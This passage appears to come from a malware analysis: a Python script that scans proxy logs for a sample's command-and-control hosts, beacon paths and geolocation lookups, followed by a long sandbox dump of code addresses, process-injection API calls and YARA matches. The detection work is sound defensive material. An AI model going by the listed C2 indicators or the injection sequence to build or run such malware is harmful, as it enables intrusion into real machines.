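    "as": 2048, "reverse": 4096, "query": 8192, "status": 16384, "message": 32768,
}


def decode_ipapi_fields(mask: int) -> List[str]:
    """Names of the ip-api.com fields selected by a numeric 'fields' mask."""
    return [name for name, bit in IPAPI_FIELDS.items() if mask & bit]


# Constructed proxy log format: <timestamp> <client> <method> <url> <status> "<user-agent>"
LOG_RE = re.compile(
    r'^(?P<ts>\S+) (?P<src>\S+) (?P<method>[A-Z]+) (?P<url>\S+) (?P<status>\d{3}) "(?P<ua>[^"]*)"$'
)


def classify(line: str) -> Optional[dict]:
    """Return a hit record when a log line matches the sample's indicators, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    url = urlsplit(m["url"])
    host, path = (url.hostname or "").lower(), url.path
    reasons: List[str] = []
    if host in C2_HOSTS:
        reasons.append("known C2 host")
    if path in C2_PATHS:
        reasons.append("beacon path " + path)
    if host == "ip-api.com" and path == "/json/":
        # The sample asks for countryCode, region and query (its own public IP).
        raw = parse_qs(url.query).get("fields", ["0"])[0]
        names = decode_ipapi_fields(int(raw)) if raw.isdigit() else raw.split(",")
        reasons.append("ip-api geolocation: " + ",".join(names))
    if reasons and m["ua"] == SAMPLE_UA:
        reasons.append("hard-coded Chrome/94 UA")
    if not reasons:
        return None
    return {"ts": m["ts"], "src": m["src"], "host": host, "reasons": reasons}


def scan(lines) -> List[dict]:
    """All hits, in log order."""
    return [hit for hit in (classify(line) for line in lines) if hit]


# Constructed sample log: one benign Chrome request, then the sequence the report shows.
SAMPLE_LOG = [
    f'2021-10-18T10:04:59Z 10.0.0.5 GET https://support.google.com/chrome/?p=plugin_pdf 200 "{SAMPLE_UA}"',
    f'2021-10-18T10:05:03Z 10.0.0.5 GET http://ip-api.com/json/?fields=8198 200 "{SAMPLE_UA}"',
    f'2021-10-18T10:05:12Z 10.0.0.5 POST https://bh.mygameadmin.com/report7.4.php 200 "{SAMPLE_UA}"',
    f'2021-10-18T10:05:14Z 10.0.0.5 GET https://fg.mygameagend.com/dll 200 "{SAMPLE_UA}"',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit["ts"], hit["src"], hit["host"], "; ".join(hit["reasons"]))
```

The ip-api.com request alone is a weak signal (plenty of legitimate software geolocates itself), which is why it is reported with the decoded field list rather than as a C2 hit; the fixed Chrome/94 User-Agent was a current browser string at analysis time and is likewise only attached to lines that already matched. The live.com, windows.net and xboxlive.com strings attributed to process 0x22 are left off the indicator list because the report ties no traffic to them.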

System Summary:

Source: C:\Windows\Installer\MSIFBC3.tmp | Code function: 10_2_004323DC
Source: C:\Windows\Installer\MSIFBC3.tmp | Code function: 10_2_004255DC
Source: C:\Windows\Installer\MSIFBC3.tmp | Code function: 10_2_0040E9C4
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmp | Code function: 11_2_006B6128
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmp | Code function: 11_2_0040C938
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 13_2_04EED4C1
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 13_2_04EB1C60
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 13_2_04EF0C01
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 13_2_04EBC540
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 13_2_04EE77D9
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 13_2_04EDC770
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 13_2_04EDAF40
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 13_2_04EDA860
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 13_2_04ED11A0
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 13_2_04ED69B0
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 13_2_04EBC990
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 13_2_04ECA160
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 13_2_04ED73ED
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 13_2_04EBBBF0
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 13_2_04EE5B60
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 13_2_04D93CAB
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 13_2_04D7A0D5
Source: C:\Windows\System32\svchost.exe | Code function: 14_2_0000024B7D0EC6B0
Source: C:\Windows\System32\svchost.exe | Code function: 14_2_0000024B7D0EF5E0
Source: C:\Windows\System32\svchost.exe | Code function: 14_2_0000024B7D0E0E00
Source: C:\Windows\System32\svchost.exe | Code function: 14_2_0000024B7D0E4E00
Source: C:\Windows\System32\svchost.exe | Code function: 14_2_0000024B7D0FBE25
Source: C:\Windows\System32\svchost.exe | Code function: 14_2_0000024B7D0E6E10
Source: C:\Windows\System32\svchost.exe | Code function: 14_2_0000024B7D0D9640
Source: C:\Windows\System32\svchost.exe | Code function: 14_2_0000024B7D0E4660
Source: C:\Windows\System32\svchost.exe | Code function: 14_2_0000024B7D10BEE0
Source: C:\Windows\System32\svchost.exe | Code function: 14_2_0000024B7D0FC575
Source: C:\Windows\System32\svchost.exe | Code function: 14_2_0000024B7D10DDC4
Source: C:\Windows\System32\svchost.exe | Code function: 14_2_0000024B7D10C5B0
Source: C:\Windows\System32\svchost.exe | Code function: 14_2_0000024B7D0E6010
Source: C:\Windows\System32\svchost.exe | Code function: 14_2_0000024B7D10680C
Source: C:\Windows\System32\svchost.exe | Code function: 14_2_0000024B7D10A068
Source: C:\Windows\System32\svchost.exe | Code function: 14_2_0000024B7D0F4070
Source: C:\Windows\System32\svchost.exe | Code function: 14_2_0000024B7D1008E0
Source: C:\Windows\System32\svchost.exe | Code function: 14_2_0000024B7D1148CC
Source: C:\Windows\System32\svchost.exe | Code function: 14_2_0000024B7D119EFD
Source: C:\Windows\System32\svchost.exe | Code function: 14_2_0000024B7D0DF730
Source: C:\Windows\System32\svchost.exe | Code function: 14_2_0000024B7D0ECF50
Source: C:\Windows\System32\svchost.exe | Code function: 14_2_0000024B7D0D2FA0
Source: C:\Windows\System32\svchost.exe | Code function: 14_2_0000024B7D0E8FB0
Source: C:\Windows\System32\svchost.exe | Code function: 14_2_0000024B7D0DE200
Source: C:\Windows\System32\svchost.exe | Code function: 14_2_0000024B7D11026C
Source: C:\Windows\System32\svchost.exe | Code function: 14_2_0000024B7D0D5280
Source: C:\Windows\System32\svchost.exe | Code function: 14_2_0000024B7D0D92C0
Source: C:\Windows\System32\svchost.exe | Code function: 14_2_0000024B7D100100
Source: C:\Windows\System32\svchost.exe | Code function: 14_2_0000024B7D0D8100
Source: C:\Windows\System32\svchost.exe | Code function: 14_2_0000024B7D11A116
Source: C:\Windows\System32\svchost.exe | Code function: 14_2_0000024B7D0E1150
Source: C:\Windows\System32\svchost.exe | Code function: 14_2_0000024B7D0E8190
Source: C:\Windows\System32\svchost.exe | Code function: 14_2_0000024B7D1179DC
Source: C:\Windows\System32\svchost.exe | Code function: 14_2_0000024B7D0E51D0
Source: C:\Windows\System32\svchost.exe | Code function: 14_2_0000024B7D0EE450
Source: C:\Windows\System32\svchost.exe | Code function: 14_2_0000024B7D0FE480
Source: C:\Windows\System32\svchost.exe | Code function: 14_2_0000024B7D0FBC8D
Source: C:\Windows\System32\svchost.exe | Code function: 14_2_0000024B7D0F0CB0
Source: C:\Windows\System32\svchost.exe | Code function: 14_2_0000024B7D0EB4B0
Source: C:\Windows\System32\svchost.exe | Code function: 14_2_0000024B7D0F72F0
Source: C:\Windows\System32\svchost.exe | Code function: 14_2_0000024B7D0FC31E
Source: C:\Windows\System32\svchost.exe | Code function: 14_2_0000024B7D0F8310
Source: C:\Windows\System32\svchost.exe | Code function: 14_2_0000024B7D102360
Source: C:\Windows\System32\svchost.exe | Code function: 14_2_0000024B7D0D7380
Source: C:\Windows\System32\svchost.exe | Code function: 14_2_0000024B7D0DEBD0
Source: C:\Windows\System32\svchost.exe | Code function: 14_2_0000024B7C9A02E8
Source: C:\Windows\System32\svchost.exe | Code function: 16_2_0000012E17881150
Source: C:\Windows\System32\svchost.exe | Code function: 16_2_0000012E1788F5E0
Source: C:\Windows\System32\svchost.exe | Code function: 16_2_0000012E17890CB0
Source: C:\Windows\System32\svchost.exe | Code function: 16_2_0000012E1788E450
Source: C:\Windows\System32\svchost.exe | Code function: 16_2_0000012E1787EBD0
Source: C:\Windows\System32\svchost.exe | Code function: 16_2_0000012E178972F0
Source: C:\Windows\System32\svchost.exe | Code function: 16_2_0000012E17898310
Source: C:\Windows\System32\svchost.exe | Code function: 16_2_0000012E1789C31E
Source: C:\Windows\System32\svchost.exe | Code function: 16_2_0000012E178A2360
Source: C:\Windows\System32\svchost.exe | Code function: 16_2_0000012E17875280
Source: C:\Windows\System32\svchost.exe | Code function: 16_2_0000012E178792C0
Source: C:\Windows\System32\svchost.exe | Code function: 16_2_0000012E1787E200
Source: C:\Windows\System32\svchost.exe | Code function: 16_2_0000012E178B026C
Source: C:\Windows\System32\svchost.exe | Code function: 16_2_0000012E17888190
Source: C:\Windows\System32\svchost.exe | Code function: 16_2_0000012E178B79DC
Source: C:\Windows\System32\svchost.exe | Code function: 16_2_0000012E178851D0
Source: C:\Windows\System32\svchost.exe | Code function: 16_2_0000012E17878100
Source: C:\Windows\System32\svchost.exe | Code function: 16_2_0000012E178A0100
Source: C:\Windows\System32\svchost.exe | Code function: 16_2_0000012E178BA116
Source: C:\Windows\System32\svchost.exe | Code function: 16_2_0000012E17894070
Source: C:\Windows\System32\svchost.exe | Code function: 16_2_0000012E178B48CC
Source: C:\Windows\System32\svchost.exe | Code function: 16_2_0000012E178A08E0
Source: C:\Windows\System32\svchost.exe | Code function: 16_2_0000012E178A680C
Source: C:\Windows\System32\svchost.exe | Code function: 16_2_0000012E17886010
Source: C:\Windows\System32\svchost.exe | Code function: 16_2_0000012E178AA068
Source: C:\Windows\System32\svchost.exe | Code function: 16_2_0000012E17872FA0
Source: C:\Windows\System32\svchost.exe | Code function: 16_2_0000012E17888FB0
Source: C:\Windows\System32\svchost.exe | Code function: 16_2_0000012E178B9EFD
Source: C:\Windows\System32\svchost.exe | Code function: 16_2_0000012E1787F730
Source: C:\Windows\System32\svchost.exe | Code function: 16_2_0000012E1788CF50
Source: C:\Windows\System32\svchost.exe | Code function: 16_2_0000012E1788C6B0
Source: C:\Windows\System32\svchost.exe | Code function: 16_2_0000012E178ABEE0
Source: C:\Windows\System32\svchost.exe | Code function: 16_2_0000012E17880E00
Source: C:\Windows\System32\svchost.exe | Code function: 16_2_0000012E17884E00
Source: C:\Windows\System32\svchost.exe | Code function: 16_2_0000012E17886E10
Source: C:\Windows\System32\svchost.exe | Code function: 16_2_0000012E1789BE25
Source: C:\Windows\System32\svchost.exe | Code function: 16_2_0000012E17879640
Source: C:\Windows\System32\svchost.exe | Code function: 16_2_0000012E17884660
Source: C:\Windows\System32\svchost.exe | Code function: 16_2_0000012E1789C575
Source: C:\Windows\System32\svchost.exe | Code function: 16_2_0000012E178AC5B0
Source: C:\Windows\System32\svchost.exe | Code function: 16_2_0000012E178ADDC4
Source: C:\Windows\System32\svchost.exe | Code function: 16_2_0000012E1789BC8D
Source: C:\Windows\System32\svchost.exe | Code function: 16_2_0000012E1789E480
Source: C:\Windows\System32\svchost.exe | Code function: 16_2_0000012E1788B4B0
Source: C:\Windows\System32\svchost.exe | Code function: 16_2_0000012E17877380
Source: C:\Windows\System32\svchost.exe | Code function: 16_2_0000012E1980ACA8
Source: C:\Windows\System32\svchost.exe | Code function: 16_2_0000012E198044D4
Source: C:\Windows\System32\svchost.exe | Code function: 16_2_0000012E19805AE8
Source: C:\Windows\System32\svchost.exe | Code function: 16_2_0000012E19821731
Source: C:\Windows\System32\svchost.exe | Code function: 16_2_0000012E198245C0
Source: C:\Windows\System32\svchost.exe | Code function: 16_2_0000012E19821D97
Source: C:\Windows\System32\svchost.exe | Code function: 16_2_0000012E1987B510
Source: C:\Windows\System32\svchost.exe | Code function: 16_2_0000012E1984C530
Source: C:\Windows\System32\svchost.exe | Code function: 16_2_0000012E19834480
Source: C:\Windows\System32\svchost.exe | Code function: 16_2_0000012E198894C0
Source: C:\Windows\System32\svchost.exe | Code function: 16_2_0000012E1989C410
Source: C:\Windows\System32\svchost.exe | Code function: 16_2_0000012E19832430
Source: C:\Windows\System32\svchost.exe | Code function: 16_2_0000012E1984B380
Source: C:\Windows\System32\svchost.exe | Code function: 16_2_0000012E198AC380
Source: C:\Windows\System32\svchost.exe | Code function: 16_2_0000012E198493E0
Source: C:\Windows\System32\svchost.exe | Code function: 16_2_0000012E198953E0
Source: C:\Windows\System32\svchost.exe | Code function: 16_2_0000012E198A8740
Source: C:\Windows\System32\svchost.exe | Code function: 16_2_0000012E198816E0
Source: C:\Windows\System32\svchost.exe | Code function: 16_2_0000012E198745F0
Source: C:\Windows\System32\svchost.exe | Code function: 16_2_0000012E1984F5F0
Source: C:\Windows\System32\svchost.exe | Code function: 16_2_0000012E1982A600
Source: C:\Windows\System32\svchost.exe | Code function: 16_2_0000012E1985D64A
Source: C:\Windows\System32\svchost.exe | Code function: 16_2_0000012E198D7654
Source: C:\Windows\System32\svchost.exe | Code function: 16_2_0000012E1984A660
Source: C:\Windows\System32\svchost.exe | Code function: 16_2_0000012E198D6910
Source: C:\Windows\System32\svchost.exe | Code function: 16_2_0000012E1988C950
Source: C:\Windows\System32\svchost.exe | Code function: 16_2_0000012E198D88B0
Source: C:\Windows\System32\svchost.exe | Code function: 16_2_0000012E1987C8D0
Source: C:\Windows\System32\svchost.exe | Code function: 16_2_0000012E198358E0
Source: C:\Windows\System32\svchost.exe | Code function: 16_2_0000012E198E1844
Source: C:\Windows\System32\svchost.exe | Code function: 16_2_0000012E19890844
Source: C:\Windows\System32\svchost.exe | Code function: 16_2_0000012E1983285B
Source: C:\Windows\System32\svchost.exe | Code function: 16_2_0000012E19896780
Source: C:\Windows\System32\svchost.exe | Code function: 16_2_0000012E198237AF
Source: C:\Windows\System32\svchost.exe | Code function: 16_2_0000012E19899AF0
Source: C:\Windows\System32\svchost.exe | Code function: 16_2_0000012E19842B10
Source: C:\Windows\System32\svchost.exe | Code function: 16_2_0000012E19898A90
Source: C:\Windows\System32\svchost.exe | Code function: 16_2_0000012E198A1AA0
Source: C:\Windows\System32\svchost.exe | Code function: 16_2_0000012E19829A20
Source: C:\Windows\System32\svchost.exe | Code function: 16_2_0000012E198D9A34
Source: C:\Windows\System32\svchost.exe | Code function: 16_2_0000012E19846A50
Source: C:\Windows\System32\svchost.exe | Code function: 16_2_0000012E19880A60
Source: C:\Windows\System32\svchost.exe | Code function: 16_2_0000012E1985DD37
Source: C:\Windows\System32\svchost.exe | Code function: 16_2_0000012E19850D40
Source: C:\Windows\System32\svchost.exe | Code function: 16_2_0000012E19839D55
Source: C:\Windows\System32\svchost.exe | Code function: 16_2_0000012E198DEC74
Source: C:\Windows\System32\svchost.exe | Code function: 16_2_0000012E1984EC80
Source: C:\Windows\System32\svchost.exe | Code function: 16_2_0000012E19887C80
Source: C:\Windows\System32\svchost.exe | Code function: 16_2_0000012E19855CD0
Source: C:\Windows\System32\svchost.exe | Code function: 16_2_0000012E19829CE0
Source: C:\Windows\System32\svchost.exe | Code function: 16_2_0000012E19838C20
Source: C:\Windows\System32\svchost.exe | Code function: 16_2_0000012E19865C30
Source: C:\Windows\System32\svchost.exe | Code function: 16_2_0000012E198B3C60
Source: C:\Windows\System32\svchost.exe | Code function: 16_2_0000012E19857B80
Source: C:\Windows\System32\svchost.exe | Code function: 16_2_0000012E19885BAD
Source: C:\Windows\System32\svchost.exe | Code function: 16_2_0000012E198B1BD0
Source: C:\Windows\System32\svchost.exe | Code function: 16_2_0000012E198A7F20
Source: C:\Windows\System32\svchost.exe | Code function: 16_2_0000012E1985CF3F
Source: C:\Windows\System32\svchost.exe | Code function: 16_2_0000012E1984FE00
Source: C:\Windows\System32\svchost.exe | Code function: 16_2_0000012E198E3E20
Source: C:\Windows\System32\svchost.exe | Code function: 16_2_0000012E1984AE40
Source: C:\Windows\System32\svchost.exe | Code function: 16_2_0000012E19825080
Source: C:\Windows\System32\svchost.exe | Code function: 16_2_0000012E19828090
Source: C:\Windows\System32\svchost.exe | Code function: 16_2_0000012E19834FF0
Source: C:\Windows\System32\svchost.exe | Code function: 16_2_0000012E1987BFF0
Source: C:\Windows\System32\svchost.exe | Code function: 16_2_0000012E198B3030
Source: C:\Windows\System32\svchost.exe | Code function: 16_2_0000012E198ADF70
Source: C:\Windows\System32\svchost.exe | Code function: 16_2_0000012E1989033F
Source: C:\Windows\System32\svchost.exe | Code function: 16_2_0000012E19867270
Source: C:\Windows\System32\svchost.exe | Code function: 16_2_0000012E1989B2B0
Source: C:\Windows\System32\svchost.exe | Code function: 16_2_0000012E1982A210
Source: C:\Windows\System32\svchost.exe | Code function: 16_2_0000012E19898260
Source: C:\Windows\System32\svchost.exe | Code function: 16_2_0000012E19887190
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E198BB1B016_2_0000012E198BB1B0
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E174902E816_2_0000012E174902E8
Source: C:\Windows\System32\svchost.exeCode function: 17_2_00000204F339F5E017_2_00000204F339F5E0
Source: C:\Windows\System32\svchost.exeCode function: 17_2_00000204F339B4B017_2_00000204F339B4B0
Source: C:\Windows\System32\svchost.exeCode function: 17_2_00000204F33A0CB017_2_00000204F33A0CB0
Source: C:\Windows\System32\svchost.exeCode function: 17_2_00000204F33ABC8D17_2_00000204F33ABC8D
Source: C:\Windows\System32\svchost.exeCode function: 17_2_00000204F33AC57517_2_00000204F33AC575
Source: C:\Windows\System32\svchost.exeCode function: 17_2_00000204F338EBD017_2_00000204F338EBD0
Source: C:\Windows\System32\svchost.exeCode function: 17_2_00000204F33AE48017_2_00000204F33AE480
Source: C:\Windows\System32\svchost.exeCode function: 17_2_00000204F339E45017_2_00000204F339E450
Source: C:\Windows\System32\svchost.exeCode function: 17_2_00000204F33892C017_2_00000204F33892C0
Source: C:\Windows\System32\svchost.exeCode function: 17_2_00000204F33A72F017_2_00000204F33A72F0
Source: C:\Windows\System32\svchost.exeCode function: 17_2_00000204F33AC31E17_2_00000204F33AC31E
Source: C:\Windows\System32\svchost.exeCode function: 17_2_00000204F33A831017_2_00000204F33A8310
Source: C:\Windows\System32\svchost.exeCode function: 17_2_00000204F338738017_2_00000204F3387380
Source: C:\Windows\System32\svchost.exeCode function: 17_2_00000204F33B236017_2_00000204F33B2360
Source: C:\Windows\System32\svchost.exeCode function: 17_2_00000204F339819017_2_00000204F3398190
Source: C:\Windows\System32\svchost.exeCode function: 17_2_00000204F338E20017_2_00000204F338E200
Source: C:\Windows\System32\svchost.exeCode function: 17_2_00000204F33C79DC17_2_00000204F33C79DC
Source: C:\Windows\System32\svchost.exeCode function: 17_2_00000204F33951D017_2_00000204F33951D0
Source: C:\Windows\System32\svchost.exeCode function: 17_2_00000204F338528017_2_00000204F3385280
Source: C:\Windows\System32\svchost.exeCode function: 17_2_00000204F33C026C17_2_00000204F33C026C
Source: C:\Windows\System32\svchost.exeCode function: 17_2_00000204F338810017_2_00000204F3388100
Source: C:\Windows\System32\svchost.exeCode function: 17_2_00000204F33B010017_2_00000204F33B0100
Source: C:\Windows\System32\svchost.exeCode function: 17_2_00000204F33B08E017_2_00000204F33B08E0
Source: C:\Windows\System32\svchost.exeCode function: 17_2_00000204F33C48CC17_2_00000204F33C48CC
Source: C:\Windows\System32\svchost.exeCode function: 17_2_00000204F33CA11617_2_00000204F33CA116
Source: C:\Windows\System32\svchost.exeCode function: 17_2_00000204F339115017_2_00000204F3391150
Source: C:\Windows\System32\svchost.exeCode function: 17_2_00000204F3398FB017_2_00000204F3398FB0
Source: C:\Windows\System32\svchost.exeCode function: 17_2_00000204F3382FA017_2_00000204F3382FA0
Source: C:\Windows\System32\svchost.exeCode function: 17_2_00000204F33B680C17_2_00000204F33B680C
Source: C:\Windows\System32\svchost.exeCode function: 17_2_00000204F339601017_2_00000204F3396010
Source: C:\Windows\System32\svchost.exeCode function: 17_2_00000204F33A407017_2_00000204F33A4070
Source: C:\Windows\System32\svchost.exeCode function: 17_2_00000204F33BA06817_2_00000204F33BA068
Source: C:\Windows\System32\svchost.exeCode function: 17_2_00000204F339C6B017_2_00000204F339C6B0
Source: C:\Windows\System32\svchost.exeCode function: 17_2_00000204F33C9EFD17_2_00000204F33C9EFD
Source: C:\Windows\System32\svchost.exeCode function: 17_2_00000204F33BBEE017_2_00000204F33BBEE0
Source: C:\Windows\System32\svchost.exeCode function: 17_2_00000204F338F73017_2_00000204F338F730
Source: C:\Windows\System32\svchost.exeCode function: 17_2_00000204F339CF5017_2_00000204F339CF50
Source: C:\Windows\System32\svchost.exeCode function: 17_2_00000204F33BC5B017_2_00000204F33BC5B0
Source: C:\Windows\System32\svchost.exeCode function: 17_2_00000204F3390E0017_2_00000204F3390E00
Source: C:\Windows\System32\svchost.exeCode function: 17_2_00000204F3394E0017_2_00000204F3394E00
Source: C:\Windows\System32\svchost.exeCode function: 17_2_00000204F33BDDC417_2_00000204F33BDDC4
Source: C:\Windows\System32\svchost.exeCode function: 17_2_00000204F338964017_2_00000204F3389640
Source: C:\Windows\System32\svchost.exeCode function: 17_2_00000204F33ABE2517_2_00000204F33ABE25
Source: C:\Windows\System32\svchost.exeCode function: 17_2_00000204F3396E1017_2_00000204F3396E10
Source: C:\Windows\System32\svchost.exeCode function: 17_2_00000204F339466017_2_00000204F3394660
Source: C:\Windows\System32\svchost.exeCode function: 17_2_00000204F32C02E817_2_00000204F32C02E8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_04EC98E0 GetVersionExW, GetProcAddress, OpenProcess, LoadLibraryA, GetProcAddress, LoadLibraryA, GetProcAddress, GetSystemDirectoryW, wsprintfW, LoadLibraryA, GetProcAddress, LoadLibraryA, GetProcAddress, Sleep, GetCurrentProcess, OpenProcessToken, DuplicateTokenEx, SetTokenInformation, CloseHandle, CloseHandle, CloseHandle, CloseHandle, CloseHandle, CloseHandle, CreateProcessAsUserW, CloseHandle, CreateProcessW, LoadLibraryA, GetProcAddress, CloseHandle, GetThreadContext, VirtualAllocEx, TerminateProcess, WriteProcessMemory, SetThreadContext, ResumeThread, CloseHandle, WaitForSingleObject, CloseHandle, WaitForSingleObject, OpenThread, WaitForSingleObject, GetExitCodeThread, CloseHandle, CloseHandle, WaitForSingleObject, CloseHandle
Source: MSIFBC3.tmp.2.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST (2 entries)
Source: MSIFBC3.tmp.10.dr Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: MSIFBC3.tmp.10.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST (2 entries)
Source: is-JDQA9.tmp.11.dr Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: is-JDQA9.tmp.11.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST (2 entries)
Source: is-CU1EC.tmp.11.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST (17 entries)
Source: C:\Windows\System32\msiexec.exe Section loaded: tsappcmp.dll (2 entries)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_04EC3A20 OpenSCManagerW, OpenServiceW, QueryServiceStatus, ControlService, Sleep, DeleteService, wsprintfW, SHDeleteKeyW, CloseServiceHandle, CloseServiceHandle
Matched rule: SUSP_XORed_MSDOS_Stub_Message (date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =) on the following sources:
Source: 27.2.svchost.exe.2743a320000.0.unpack, type: UNPACKEDPE
Source: 34.2.svchost.exe.202b28f0000.0.unpack, type: UNPACKEDPE
Source: 20.2.svchost.exe.1d91aad0000.0.unpack, type: UNPACKEDPE
Source: 24.2.svchost.exe.1dc51fb0000.0.unpack, type: UNPACKEDPE
Source: 37.2.svchost.exe.1afba170000.0.unpack, type: UNPACKEDPE
Source: 13.2.rundll32.exe.4eb0000.0.unpack, type: UNPACKEDPE
Source: 28.2.svchost.exe.1111ac00000.0.unpack, type: UNPACKEDPE
Source: 30.2.svchost.exe.1be5cd40000.0.unpack, type: UNPACKEDPE
Source: 16.2.svchost.exe.12e17870000.0.unpack, type: UNPACKEDPE
Source: 28.0.svchost.exe.1111ac00000.0.unpack, type: UNPACKEDPE
Source: 34.0.svchost.exe.202b28f0000.0.unpack, type: UNPACKEDPE
Source: 25.2.svchost.exe.2216b8b0000.0.raw.unpack, type: UNPACKEDPE
Source: 17.0.svchost.exe.204f3380000.0.unpack, type: UNPACKEDPE
Source: 34.0.svchost.exe.202b28f0000.0.raw.unpack, type: UNPACKEDPE
Source: 38.0.svchost.exe.25c96c80000.0.raw.unpack, type: UNPACKEDPE
Source: 27.2.svchost.exe.2743a320000.0.raw.unpack, type: UNPACKEDPE
Source: 37.0.svchost.exe.1afba170000.0.unpack, type: UNPACKEDPE
Source: 19.2.svchost.exe.233426d0000.0.unpack, type: UNPACKEDPE
Source: 22.0.svchost.exe.222cab20000.0.raw.unpack, type: UNPACKEDPE
Source: 25.0.svchost.exe.2216b8b0000.0.raw.unpack, type: UNPACKEDPE
Source: 30.0.svchost.exe.1be5cd40000.0.raw.unpack, type: UNPACKEDPE
Source: 14.0.svchost.exe.24b7d0d0000.0.raw.unpack, type: UNPACKEDPE
Source: 24.0.svchost.exe.1dc51fb0000.0.unpack, type: UNPACKEDPE
Source: 21.0.svchost.exe.2f2c5c00000.0.raw.unpack, type: UNPACKEDPE
Source: 17.2.svchost.exe.204f3380000.0.raw.unpack, type: UNPACKEDPE
Source: 37.2.svchost.exe.1afba170000.0.raw.unpack, type: UNPACKEDPE
Source: 28.2.svchost.exe.1111ac00000.0.raw.unpack, type: UNPACKEDPE
Source: 31.2.svchost.exe.21c23140000.0.raw.unpack, type: UNPACKEDPE
Source: 23.2.svchost.exe.28621cd0000.0.unpack, type: UNPACKEDPE
Source: 27.0.svchost.exe.2743a320000.0.raw.unpack, type: UNPACKEDPE
Source: 30.2.svchost.exe.1be5cd40000.0.raw.unpack, type: UNPACKEDPE
Source: 29.0.svchost.exe.22f12740000.0.unpack, type: UNPACKEDPE
Source: 28.0.svchost.exe.1111ac00000.0.raw.unpack, type: UNPACKEDPE
Source: 23.0.svchost.exe.28621cd0000.0.unpack, type: UNPACKEDPE
Source: 29.2.svchost.exe.22f12740000.0.unpack, type: UNPACKEDPE
Source: 31.2.svchost.exe.21c23140000.0.unpack, type: UNPACKEDPE
Source: 13.2.rundll32.exe.4eb0000.0.raw.unpack, type: UNPACKEDPE
Source: 31.0.svchost.exe.21c23140000.0.unpack, type: UNPACKEDPE
Source: 27.0.svchost.exe.2743a320000.0.unpack, type: UNPACKEDPE
Source: 25.2.svchost.exe.2216b8b0000.0.unpack, type: UNPACKEDPE
Source: 17.2.svchost.exe.204f3380000.0.unpack, type: UNPACKEDPE
Source: 21.0.svchost.exe.2f2c5c00000.0.unpack, type: UNPACKEDPE
Source: 38.2.svchost.exe.25c96c80000.0.raw.unpack, type: UNPACKEDPE
Source: 14.2.svchost.exe.24b7d0d0000.0.unpack, type: UNPACKEDPE
Source: 34.2.svchost.exe.202b28f0000.0.raw.unpack, type: UNPACKEDPE
Source: 30.0.svchost.exe.1be5cd40000.0.unpack, type: UNPACKEDPE
Source: 14.2.svchost.exe.24b7d0d0000.0.raw.unpack, type: UNPACKEDPE
Source: 38.0.svchost.exe.25c96c80000.0.unpack, type: UNPACKEDPE
Source: 22.2.svchost.exe.222cab20000.0.unpack, type: UNPACKEDPE
Source: 22.0.svchost.exe.222cab20000.0.unpack, type: UNPACKEDPE
Source: 19.0.svchost.exe.233426d0000.0.unpack, type: UNPACKEDPE
Source: 31.0.svchost.exe.21c23140000.0.raw.unpack, type: UNPACKEDPE
Source: 19.0.svchost.exe.233426d0000.0.raw.unpack, type: UNPACKEDPE
Source: 23.2.svchost.exe.28621cd0000.0.raw.unpack, type: UNPACKEDPE
Source: 20.2.svchost.exe.1d91aad0000.0.raw.unpack, type: UNPACKEDPE
Source: 24.0.svchost.exe.1dc51fb0000.0.raw.unpack, type: UNPACKEDPE
Source: 29.2.svchost.exe.22f12740000.0.raw.unpack, type: UNPACKEDPE
Source: 17.0.svchost.exe.204f3380000.0.raw.unpack, type: UNPACKEDPE
Source: 22.2.svchost.exe.222cab20000.0.raw.unpack, type: UNPACKEDPE
Source: 29.0.svchost.exe.22f12740000.0.raw.unpack, type: UNPACKEDPE
Source: 21.2.svchost.exe.2f2c5c00000.0.raw.unpack, type: UNPACKEDPE
Source: 21.2.svchost.exe.2f2c5c00000.0.unpack, type: UNPACKEDPE
Source: 16.2.svchost.exe.12e17870000.0.raw.unpack, type: UNPACKEDPE
Source: 19.2.svchost.exe.233426d0000.0.raw.unpack, type: UNPACKEDPE
Source: 20.0.svchost.exe.1d91aad0000.0.raw.unpack, type: UNPACKEDPE
Source: 25.0.svchost.exe.2216b8b0000.0.unpack, type: UNPACKEDPE
Source: 38.2.svchost.exe.25c96c80000.0.unpack, type: UNPACKEDPE
Source: 23.0.svchost.exe.28621cd0000.0.raw.unpack, type: UNPACKEDPE
Source: 24.2.svchost.exe.1dc51fb0000.0.raw.unpack, type: UNPACKEDPE
Source: 37.0.svchost.exe.1afba170000.0.raw.unpack, type: UNPACKEDPE
Source: 14.0.svchost.exe.24b7d0d0000.0.unpack, type: UNPACKEDPE
Source: 20.0.svchost.exe.1d91aad0000.0.unpack, type: UNPACKEDPE
